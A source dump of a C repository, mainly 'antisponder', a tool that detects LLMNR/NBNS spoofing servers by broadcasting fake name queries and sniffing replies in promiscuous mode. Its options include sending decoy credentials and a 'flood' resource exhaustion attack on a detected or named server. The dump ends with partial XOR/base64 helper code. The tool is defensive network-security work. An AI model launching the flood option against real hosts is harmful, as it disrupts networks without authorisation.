9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | #include 44 | #include 45 | #include 46 | #include 47 | #include 48 | #include 49 | #include 50 | #include 51 | #include 52 | #include "interface.h" 53 | #include "rand.h" 54 | #include "getcreds.h" 55 | #include "nameres.h" 56 | #include "destroy.h" 57 | 58 | #define MAXPACKETLEN 0xFFFF 59 | 60 | char *fakehost; 61 | int seconds; 62 | int timemode; 63 | int verbose; 64 | 65 | int getrawsock(char *intname) { 66 | struct ifreq ifr; 67 | int sock; 68 | 69 | if ((sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_IP))) < 0) { 70 | perror("can't open raw socket"); 71 | exit(1); 72 | } 73 | 74 | memset(&ifr, 0x00, sizeof(struct ifreq)); 75 | strncpy(ifr.ifr_name, intname, IFNAMSIZ); 76 | if (ioctl(sock, SIOCGIFFLAGS, &ifr) < 0) { 77 | perror("can't get socket info"); 78 | exit(1); 79 | } 80 | ifr.ifr_flags |= IFF_PROMISC; 81 | if (ioctl(sock, SIOCSIFFLAGS, &ifr) < 0) { 82 | perror("can't set promic"); 83 | exit(1); 84 | } 85 | if (ioctl(sock, SIOCGIFINDEX, &ifr) == -1) { 86 | perror("can't retrieve etherenet index\n"); 87 | exit(1); 88 | } 89 | return (sock); 90 | } 91 | 92 | void *sendqueries() { 93 | int waittime; 94 | waittime = seconds; 95 | for (;;) { 96 | fillstr(fakehost, NBNAMEMIN + getrand8() % (NBNAMELEN - NBNAMEMIN), 97 | CHARALPHAUPPER); 98 | sleep(1); 99 | queryhost(fakehost); 100 | if (timemode == 1) 101 | waittime = getrand8() % (seconds * 2); 102 | if (verbose) { 103 | printf("sleeping for %i seconds\n", waittime); 104 | } 105 | sleep(waittime); 106 | } 107 | pthread_exit(NULL); 108 | } 109 | 110 | void usage(char *progname) { 111 | printf 112 | ("%s detects and disrupts broadcast name resolution MiTM attacks\n", 113 | progname); 114 | printf("\t-i\tinterface to monitor (e.g. \"eth0\")\n"); 115 | printf("\t-u\ttab delimited list of usernames and passwords\n"); 116 | printf("\t-t\ttime in seconds between probes\n"); 117 | printf("\t-p\taverage time in seconds between probes\n"); 118 | printf("\t-d\tresponses to MiTM detectoin\n"); 119 | printf("\t\tlog\tlogs the detection\n"); 120 | printf("\t\thash\tsends credentials from the file -u file\n"); 121 | printf("\t\tflood\tperform a resource exhaustion attack\n"); 122 | printf("\t-s\tspecify a known spoofing server instead of detection\n"); 123 | printf("\t-v\tverbose mode\n"); 124 | printf("\n\nExamples:\n"); 125 | printf("\t%s -d \"log hash\" -u ./usernames.txt -t 10 -i eth0\n", 126 | progname); 127 | printf 128 | ("\tThis looks for MiTM servers ever 10 seconds. It also sends a fake hash from the \"usernames.txt\" file and logs the detection\n"); 129 | printf("\t%s -d \"flood\" -s 10.0.0.23\n", progname); 130 | printf("\tThis floods the MiTM server at 10.0.0.23.\n"); 131 | } 132 | 133 | int main(int argc, char *argv[]) { 134 | int sock; 135 | int pktlen; 136 | int c; 137 | uint8_t *pkt; 138 | char *resolved; 139 | struct iphdr *ip; 140 | struct udphdr *udp; 141 | pthread_t threads[5]; 142 | char *interface = NULL; 143 | char **user = NULL; 144 | char **passwd = NULL; 145 | struct creddb *cdb = NULL; 146 | char *server = NULL; 147 | uint32_t serverip; 148 | int destroymask = DES_LOG; 149 | 150 | 151 | verbose = 0; 152 | seconds = 300; // default time interval 153 | timemode = 0; // 0 == deterministic time 154 | user = NULL; 155 | 156 | while ((c = getopt(argc, argv, "hi:u:t:p:d:s:v")) != -1) { 157 | switch (c) { 158 | case 'h': // probably help 159 | usage(argv[0]); 160 | return (0); 161 | break; 162 | case 'i': // interface to monitor 163 | interface = optarg; 164 | break; 165 | case 'u': // list of users for hashes 166 | cdb = getuserlist(optarg); 167 | user = cdb->users; 168 | passwd = cdb->passwords; 169 | break; 170 | case 't': // deterministic time 171 | seconds = atoi(optarg); 172 | break; 173 | case 'p': // probabilistic time 174 | seconds = atoi(optarg); 175 | timemode = 1; 176 | break; 177 | case 'd': // options for "destroy" log|flood|hash 178 | destroymask = getdestroymask(optarg); 179 | break; 180 | case 's': // server to "destroy" 181 | server = optarg; 182 | break; 183 | case 'v': 184 | verbose++; 185 | break; 186 | default: 187 | break; 188 | } 189 | } 190 | 191 | if (server != NULL) { 192 | serverip = resolvehost4(server); 193 | resolved = "none"; 194 | destroy(serverip, resolved, user, passwd, destroymask); 195 | return (0); 196 | } 197 | if (interface == NULL) { 198 | interface = (char *) malloc(MAXINTLEN); 199 | if (interface == NULL) { 200 | perror("can't allocaet memory"); 201 | exit(1); 202 | } 203 | guessintname(interface, MAXINTLEN); 204 | } 205 | remoteip = getipv4addr(interface); 206 | remotebcast = getipv4bcast(interface); 207 | 208 | fakehost = (char *) malloc(NBNAMELEN + 1); 209 | if (fakehost == NULL) { 210 | perror("can't allocate memory"); 211 | exit(1); 212 | } 213 | memset(fakehost, 0x00, NBNAMELEN + 1); 214 | 215 | if (pthread_create(&threads[0], NULL, sendqueries, NULL) != 0) { 216 | perror("can't thread"); 217 | exit(0); 218 | } 219 | 220 | resolved = (char *) malloc(NBNAMELEN); 221 | if (resolved == NULL) { 222 | perror("can't allocate memory"); 223 | exit(1); 224 | } 225 | 226 | pkt = (uint8_t *) malloc(MAXPACKETLEN); 227 | if (pkt == NULL) { 228 | perror("can't allocate memory"); 229 | exit(1); 230 | } 231 | memset(pkt, 0x00, MAXPACKETLEN); 232 | ip = (struct iphdr *) (pkt + sizeof(struct ethhdr)); 233 | udp = 234 | (struct udphdr *) (pkt + sizeof(struct iphdr) + 235 | sizeof(struct ethhdr)); 236 | 237 | printf("Listening on interface %s\n", interface); 238 | sock = getrawsock(interface); 239 | 240 | for (pktlen = 0; pktlen >= 0; pktlen = read(sock, pkt, MAXPACKETLEN)) { 241 | if (ip->protocol == 0x11) { 242 | if (udp->dest == (htons(137))) { 243 | memset(resolved, 0x00, NBNAMELEN); 244 | parsenbns((uint8_t *) ip, 245 | MAXPACKETLEN - (sizeof(struct iphdr) + 246 | sizeof(struct iphdr)), resolved); 247 | } else if (udp->source == (htons(5355))) { 248 | 249 | parsellmnr((uint8_t *) ip, 250 | MAXPACKETLEN - (sizeof(struct iphdr) + 251 | sizeof(struct iphdr)), 252 | resolved); 253 | } 254 | if ((strlen(resolved) > 0) 255 | && (!strncasecmp(resolved, fakehost, strlen(fakehost)))) { 256 | destroy(ip->saddr, resolved, user, passwd, destroymask); 257 | resolved[0] = 0x00; //no more destroying 258 | } 259 | } 260 | memset(pkt, 0x00, MAXPACKETLEN); 261 | } 262 | 263 | return (0); 264 | } 265 | -------------------------------------------------------------------------------- /antisponder/nameres.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include "interface.h" 42 | #include "rand.h" 43 | #include "getcreds.h" 44 | #include "nameres.h" 45 | 46 | 47 | #define NBNAMELEN 32 48 | 49 | int senddgram(uint32_t s_ip, uint32_t d_ip, uint16_t sport, 50 | uint16_t dport, uint8_t * buf, int buflen); 51 | int sendudp(uint32_t s_ip, uint32_t d_ip, uint16_t sport, uint16_t dport, 52 | uint8_t * buf, int buflen); 53 | int sendHTTPhash(char *username, char *password, char *host, char *url); 54 | 55 | 56 | int firstlevelencode(char *str, uint8_t * outbuf) { 57 | int i; 58 | char *inbuf; 59 | 60 | inbuf = (char *) malloc(NBNAMELEN); 61 | if (inbuf == NULL) { 62 | perror("can't allocate memory\n"); 63 | exit(1); 64 | } 65 | memset(inbuf, 0x20, NBNAMELEN); 66 | inbuf[(NBNAMELEN / 2) - 1] = 0x00; 67 | if (strlen(str) > NBNAMELEN) 68 | str[NBNAMELEN / 2] = 0x00; 69 | memcpy(inbuf, str, strlen(str)); 70 | // covert lower to upper case 71 | for (i = 0; i < strlen(str); i++) { 72 | if ((inbuf[i] >= 'a') && (inbuf[i] <= 'z')) 73 | inbuf[i] -= 32; 74 | } 75 | 76 | for (i = 0; i < NBNAMELEN / 2; i++) { 77 | outbuf[i * 2] = (inbuf[i] >> 4) + 0x41; 78 | outbuf[(i * 2) + 1] = (inbuf[i] & 0x0f) + 0x41; 79 | } 80 | outbuf[NBNAMELEN] = 0x00; 81 | free(inbuf); 82 | return (0); 83 | } 84 | 85 | struct nbnsq *querynbns(char *hostname) { 86 | struct nbnsq *nq; 87 | 88 | nq = (struct nbnsq *) malloc(sizeof(struct nbnsq)); 89 | if (nq == NULL) { 90 | perror("can't allocate memory\n"); 91 | exit(1); 92 | } 93 | memset(nq, 0x00, sizeof(struct nbnsq)); 94 | 95 | nq->transaction_id = getrand16(); 96 | nq->flags = htons(0x0110); 97 | nq->questions = htons(0x0001); 98 | nq->name[0] = 0x20; 99 | firstlevelencode(hostname, nq->name + 1); 100 | nq->type = htons(0x0020); // type == NB 101 | nq->class = htons(0x0001); // class = IN 102 | return (nq); 103 | } 104 | 105 | uint8_t *queryllmnr(char *hostname) { 106 | uint8_t *lq; 107 | int querylen; 108 | struct llmnrq_header *lqh; 109 | struct llmnrq_footer *lqf; 110 | 111 | if (strlen(hostname) > 0xff) { 112 | hostname[0xff] = 0x00; 113 | } 114 | querylen = 115 | sizeof(struct llmnrq_header) + sizeof(struct llmnrq_footer) + 116 | strlen(hostname); 117 | 118 | lq = (uint8_t *) malloc(querylen); 119 | if (lq == NULL) { 120 | perror("can't allocate memory"); 121 | exit(1); 122 | } 123 | memset(lq, 0x00, querylen); 124 | 125 | lqh = (struct llmnrq_header *) lq; 126 | lqf = 127 | (struct llmnrq_footer *) (lq + sizeof(struct llmnrq_header) + 128 | strlen(hostname)); 129 | 130 | lqh->transaction_id = getrand16(); // make this random 131 | lqh->questions = htons(0x0001); 132 | lqh->len = strlen(hostname); 133 | 134 | lqf->type = htons(0x0001); 135 | lqf->class = htons(0x0001); 136 | memcpy(lq + (sizeof(struct llmnrq_header) - 1), hostname, 137 | strlen(hostname)); 138 | 139 | return (lq); 140 | } 141 | 142 | int queryhost(char *hostname) { 143 | uint8_t *llmnrq; 144 | struct nbnsq *nq; 145 | nq = querynbns(hostname); 146 | 147 | sendudp(remoteip, remotebcast, 137, 137, (uint8_t *) nq, 148 | sizeof(struct nbnsq)); 149 | 150 | llmnrq = queryllmnr(hostname); 151 | sendudp(remotebcast, 0xe00000fc, getrand16(), 5355, (uint8_t *) llmnrq, 152 | sizeof(struct llmnrq_header) + sizeof(struct llmnrq_footer) + 153 | strlen(hostname)); 154 | free(llmnrq); 155 | free(nq); 156 | return (0); 157 | } 158 | 159 | int parsellmnr(uint8_t * pkt, int pktlen, char *outstr) { 160 | struct llmnrq_header *lqh; 161 | uint8_t *name; 162 | 163 | lqh = 164 | (struct llmnrq_header *) (pkt + sizeof(struct iphdr) + 165 | sizeof(struct udphdr)); 166 | 167 | memset(outstr, 0x00, NBNAMELEN); 168 | if (lqh->rr_answer == 0) { 169 | return (0); 170 | } 171 | name = (uint8_t *) lqh + (sizeof(struct llmnrq_header) - 1); 172 | memcpy(outstr, name, lqh->len); 173 | 174 | return (0); 175 | } 176 | 177 | int parsenbns(uint8_t * pkt, int pktlen, char *outstr) { 178 | int i; 179 | int n; 180 | struct nbnsq *nq; 181 | 182 | nq = (struct nbnsq *) (pkt + sizeof(struct iphdr) + 183 | sizeof(struct udphdr)); 184 | 185 | memset(outstr, 0x00, NBNAMELEN); 186 | // there are no answers to read, so just quit 187 | if (nq->rr_answer == 0) { 188 | return (0); 189 | } 190 | // sanity check to make sure we don't parse bad input 191 | for (i = 1; i <= NBNAMELEN; i++) { 192 | if ((nq->name[i] < 'A') || (nq->name[i] > 'P')) { 193 | return (0); 194 | } 195 | } 196 | n = 0; 197 | for (i = 1; i <= NBNAMELEN; i += 2) { 198 | outstr[n++] = 199 | (((nq->name[i] - 0x41) << 4) | (nq->name[i + 1] - 0x41)); 200 | 201 | } 202 | 203 | return (0); 204 | } 205 | 206 | uint32_t resolvehost4(char *host) { 207 | uint32_t ip; 208 | struct hostent *hp; 209 | ip = inet_addr(host); 210 | if (ip == INADDR_NONE) { 211 | #ifndef STATIC // gethostbyname() doesn't like static compilation 212 | hp = gethostbyname(host); 213 | memcpy(&ip, hp->h_addr, 4); 214 | #endif 215 | } 216 | return (ip); 217 | } 218 | -------------------------------------------------------------------------------- /antisponder/nameres.h: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | struct nbnsq *querynbns(char *hostname); 34 | uint8_t *queryllmnr(char *hostname); 35 | int queryhost(char *hostname); 36 | int parsellmnr(uint8_t * pkt, int pktlen, char *outstr); 37 | int parsenbns(uint8_t * pkt, int pktlen, char *outstr); 38 | uint32_t resolvehost4(char *hostname); 39 | 40 | #define NBNAMELEN 32 41 | #define NBNAMEMIN 8 42 | 43 | struct nbnsq { 44 | uint16_t transaction_id; 45 | uint16_t flags; 46 | uint16_t questions; 47 | uint16_t rr_answer; 48 | uint16_t rr_authority; 49 | uint16_t rr_additional; 50 | uint8_t name[34]; 51 | uint16_t type; 52 | uint16_t class; 53 | }; 54 | 55 | struct llmnrq_header { 56 | uint16_t transaction_id; 57 | uint16_t flags; 58 | uint16_t questions; 59 | uint16_t rr_answer; 60 | uint16_t rr_authority; 61 | uint16_t rr_additional; 62 | uint8_t len; 63 | }; 64 | 65 | struct llmnrq_footer { 66 | uint16_t type; 67 | uint16_t class; 68 | }; 69 | -------------------------------------------------------------------------------- /antisponder/rand.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | 42 | 43 | uint16_t getrand16() { 44 | int fd; 45 | uint16_t rand; 46 | 47 | fd = open("/dev/urandom", O_RDONLY); 48 | if (fd == -1) { 49 | perror("can't read /dev/urandom"); 50 | exit(1); 51 | } 52 | if (read(fd, &(rand), 2) == 0) { 53 | rand = 0x00; 54 | } 55 | 56 | close(fd); 57 | return (rand); 58 | } 59 | 60 | 61 | uint8_t getrand8() { 62 | int fd; 63 | uint8_t rand; 64 | 65 | fd = open("/dev/urandom", O_RDONLY); 66 | if (fd == -1) { 67 | perror("can't read /dev/urandom"); 68 | exit(1); 69 | } 70 | if (read(fd, &(rand), 1) == 0) { 71 | rand = 0x00; 72 | } 73 | 74 | close(fd); 75 | return (rand); 76 | } 77 | 78 | int fillstr(char *str, int len, char *mode) { 79 | int i; 80 | for (i = 0; i < len; i++) { 81 | str[i] = mode[getrand16() % strlen(mode)]; 82 | } 83 | str[i] = 0x00; 84 | return (0); 85 | } 86 | -------------------------------------------------------------------------------- /antisponder/rand.h: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | uint16_t getrand16(); 34 | uint8_t getrand8(); 35 | int fillstr(char *str, int len, char *mode); 36 | 37 | #define CHARALPHAUPPER "ABCDEFGHIJKLMNOPQRSTUVWXYZ" 38 | #define CHARALPHALOWER "abcdefghijklmnopqrstuvwxyz" 39 | #define CHARNUM "0123456789" 40 | #define CHAREVERYTHING "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz01234567890~!@#$%^&*()_+`-={}|[]:\"\\;':<>?,./" 41 | -------------------------------------------------------------------------------- /antisponder/udp.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | 44 | int sendudp(uint32_t s_ip, uint32_t d_ip, uint16_t sport, uint16_t dport, 45 | uint8_t * buf, int buflen) { 46 | int sock; 47 | struct sockaddr_in daddr; 48 | struct sockaddr_in saddr; 49 | int one = 1; 50 | 51 | sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); 52 | if (sock <= 0) { 53 | perror("Can't open socket"); 54 | exit(1); 55 | } 56 | 57 | daddr.sin_family = AF_INET; 58 | daddr.sin_addr.s_addr = htonl(d_ip); 59 | daddr.sin_port = htons(dport); 60 | 61 | saddr.sin_family = AF_INET; 62 | saddr.sin_addr.s_addr = htonl(s_ip); 63 | saddr.sin_port = htons(sport); 64 | 65 | if (bind(sock, (const struct sockaddr *) &saddr, sizeof(saddr)) < 0) { 66 | perror("can't bind socket"); 67 | exit(1); 68 | } 69 | 70 | setsockopt(sock, SOL_SOCKET, SO_BROADCAST, &one, sizeof(one)); 71 | sendto(sock, buf, buflen, 0, (const struct sockaddr *) &daddr, 72 | sizeof(struct sockaddr_in)); 73 | 74 | close(sock); 75 | 76 | return (0); 77 | } 78 | -------------------------------------------------------------------------------- /ewok/CryptoShenanigans.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | 42 | #include "global.h" 43 | 44 | void xormem(uint8_t * start, uint8_t * key, int keylen) 45 | { 46 | int i; 47 | for (i = 0; i < keylen; i++) { 48 | start[i] = start[i] ^ key[i]; 49 | } 50 | } 51 | 52 | uint8_t *xorstr(char *str, char *key) 53 | { 54 | int keylen; 55 | int keyoffset; 56 | int i; 57 | 58 | uint8_t *outbuf; 59 | outbuf = (uint8_t *) malloc(strlen(str) + 1); 60 | if (outbuf == NULL) { 61 | perror("can't allocate memory"); 62 | exit(1); 63 | } 64 | memset(outbuf, 0x00, (strlen(str) + 1)); 65 | 66 | keylen = strlen(key); 67 | keyoffset = 0; 68 | for (i = 0; i < strlen(str); i++) { 69 | outbuf[i] = str[i] ^ key[keyoffset++]; 70 | if (keyoffset == keylen) { 71 | keyoffset = 0; 72 | } 73 | } 74 | return (outbuf); 75 | } 76 | /* 77 | * Base64 encoding/decoding (RFC1341) 78 | * Copyright (c) 2005-2011, Jouni Malinen 79 | * 80 | * This software may be distributed under the terms of the BSD license. 81 | * See README for more details. 82 | */ 83 | 84 | /** 85 | * base64_encode - Base64 encode 86 | * @src: Data to be encoded 87 | * @len: Length of the data to be encoded 88 | * @out_len: Pointer to output length variable, or %NULL if not used 89 | * Returns: Allocated buffer of out_len bytes of encoded data, 90 | * or %NULL on failure 91 | * 92 | * 